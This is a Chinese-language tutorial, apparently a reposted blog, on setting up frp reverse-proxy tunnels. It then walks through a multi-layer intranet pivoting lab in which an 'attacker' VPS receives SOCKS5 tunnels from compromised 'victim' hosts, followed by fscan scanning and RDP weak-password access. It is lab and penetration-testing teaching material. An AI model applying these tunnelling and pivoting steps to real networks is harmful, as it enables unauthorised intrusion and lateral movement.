赞
踩
- 项目地址:https://github.com/fatedier/frp
- 中文文档:https://gofrp.org/docs/
frp 是一个可用于内网穿透的高性能的全平台反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网
frp 采用 Golang 编写,支持跨平台,仅需下载对应平台的二进制文件即可执行,没有额外依赖
Frp 分为服务端和客户端
部分配置参数
frps: [common] bind_addr = 0.0.0.0 # 服务端监听地址 bind_port = 7000 # 服务端监听端口,默认7000 auth_token = xxxxxxxx # 验证凭据 frpc: [common] server_addr = x.x.x.x # 连接的服务器IP地址 server_port = 7000 # 连接的服务器端口 [http_proxy] type = tcp # 连接类型为tcp local_ip = x.x.x.x # 本地ip local_port = 8888 # 本地监听端口 remote_port = 8888 # 远程服务器端口 use_encryption = true #启⽤加密 plugin = socks5 # 使⽤插件socks5代理
测试环境如下
主机 C 在内网,攻击者不能直接访问,如果想要访问内网主机可以把其端口映射到公网主机上,因
为这种方式是从 C 内部发起请求的,所以很好的穿透防火墙
在公网 VPS 上搭建服务端
wget https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz
tar zxvf frp_0.33.0_linux_amd64.tar.gz
mv frp_0.33.0_linux_amd64 frp
cd frp
配置服务端文件 frps.ini
[common]
bind_port = 7777
token = ocean1234
客户端连接的端口、token 为连接密码,使用命令启动服务端
./frps -c frps.ini
# 如果版本不正确无法启动
以上服务端配置完毕,frps 启动后将监听监听 7000 端口,用 ps aux 查看进程信息 和 netstat antl 端口
经常使用的话可以设置开启自启
设置开机启动 vi /lib/systemd/system/frps.service [Unit] Description=fraps service After=network.target syslog.target Wants=network.target [Service] Type=simple #启动服务的命令(此处写你的 frps 的实际安装目录) ExecStart=/root/frp/frps -c /root/frp/frps.ini [Install] WantedBy=multi-user.target #启动 frpc systemctl daemon-reload systemctl start frps #设置为开机启动 systemctl enable frps
客户端下载系统对应合适版本 frp,下载之后配置 frpc.ini 文件
[common]
server_addr = 112.12.179.138 #服务器的 IP
server_port = 7777 # Frp 服务的端口
token = ocean1234 #连接的密码
[web] #服务器名
type = tcp #连接协议类型
local_ip = 127.0.0.1 #访问的 ip 可以是内网任何一个 ip
local_port = 80 # 本地端口
remote_port = 7000 # 想要映射到远程服务器的端口
注:配置文件中不要出现注释
./frpc.exe -c ./frpc.ini
正常启动
因为内网主机 80 端口存在业务,frp 启动成功后可以在浏览器访问 B 的 7000 端口,这样就成功将内网主机的 80 端口通过建立 Frp 内网穿透映射到了 B 的 7000 端口
注意:VPS 的7000 和 7777 端口需要在服务器安全组中放开
稍后会更新一篇使用 Frp 多层内网通信隧道搭建的文章深入探索 Frp 这款工具
本机将会介绍使用 Frp 工具构建多层内网通信隧道,关于 Frp 上一节已经介绍过不在不说,直达链接
攻击者
VPS:121.196.173.254
Win11:192.168.179.1
受害者
Debian:192.168.179.134(实际应为公网 IP)、10.10.10.2
Winserver2008:10.10.10.3、10.0.0.4
Winserver2003:10.0.0.2、10.0.10.2
Win xp:10.0.10.3
环境配置
部分虚拟机需要添加双网卡,在虚拟机设置中设置 Lan 区段即可
进入虚拟机后设置 IP 地址和子网掩码,要注意的是虚拟机设置中的网络适配器和电脑中网络适配器顺序一致,比如网络适配器2就是win中的本地连接2(如果之前配置过号码可能不一致,但肯定是第二个)
所有主机设置完毕后保证同一网段主机可以相互 ping 通
在通过 webshell 或者其他手段拿到 Debian 主机权限后,发现其存在第二张网卡为 10.10.10.0/24 网段的,但是攻击机没办法直接访问这个网段
因为无法直接访问内网网段,所以需要使用代理
攻击者 VPS 启动 frps 监听,配置文件如下
[common]
bind_addr = 0.0.0.0
bind_port = 7000
token = ocean1234
启动
./frps -c frps.ini
Debian 启动 frpc,配置文件如下
[common]
server_addr = 121.196.173.254
server_port = 7000
token = ocean1234
[http_proxy]
type = tcp
local_ip = 10.10.10.2
remote_port = 8888
local_port = 8888
plugin = socks5
连接远程的 VPS 7000 端口的 Frps 服务,将本机内网 IP 的 8888 端口流量转发出去
使用命令启动 frpc
./frpc -c ./frpc.ini
VPS 防火墙这两个端口都要放行
攻击者 Win11,可以使用代理去访问,使用 proxifier 工具添加代理
设置好代理之后可以使用隧道去扫描内网 10.10.10.0/24 网段主机,为了保证攻击者 win11 可以正常访问网络,可以设置代理规则
扫描使用的是 Fscan
项目地址:https://github.com/shadow1ng/fscan/releases/tag/1.6.3
发现存在内网主机 10.10.10.3 开放 3389 端口
以下为第一层隧道示意图
假如我们通过3389弱口令拿到 10.10.10.3 这台主机,但是经过查看后发现它还有第二个网段 10.0.0.4/24
但是目前我们的隧道只能访问到 10.10.10.0/24 这个网段,遂需要搭建第二层通信隧道,这个时候 Debian 既是客户端,也是服务端
修改 Debian 主机的 frp 配置文件
现在 debian 既是客户端,也是服务端,需要修改 frps.ini
[common]
bind_addr = 10.10.10.2
bind_port = 1111
这里的 IP 就是 Debian 主机的 10.0.0.0/24 网段 IP,启动 frps
./frps -c frps.ini
通过 3389 配置 Winserver2008 的客户端 Frpc
[common]
server_addr = 10.10.10.2
server_port = 1111
[web]
type = tcp
local_ip = 127.0.0.1
local_port = 8888
remote_port = 8888
plugin = socks5
启动 frpc
frpc.exe -c frpc.ini
攻击者设置 win11 代理并添加到代理链中
但在实际中我却遇到了问题
winserver2008 的 frpc 提示报错,搜索众多后发现可能是网络的问题
而且把 frpc 端口换为 80,不使用 socks5,可以成功
之后的其实做法都一样所以不在演示
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。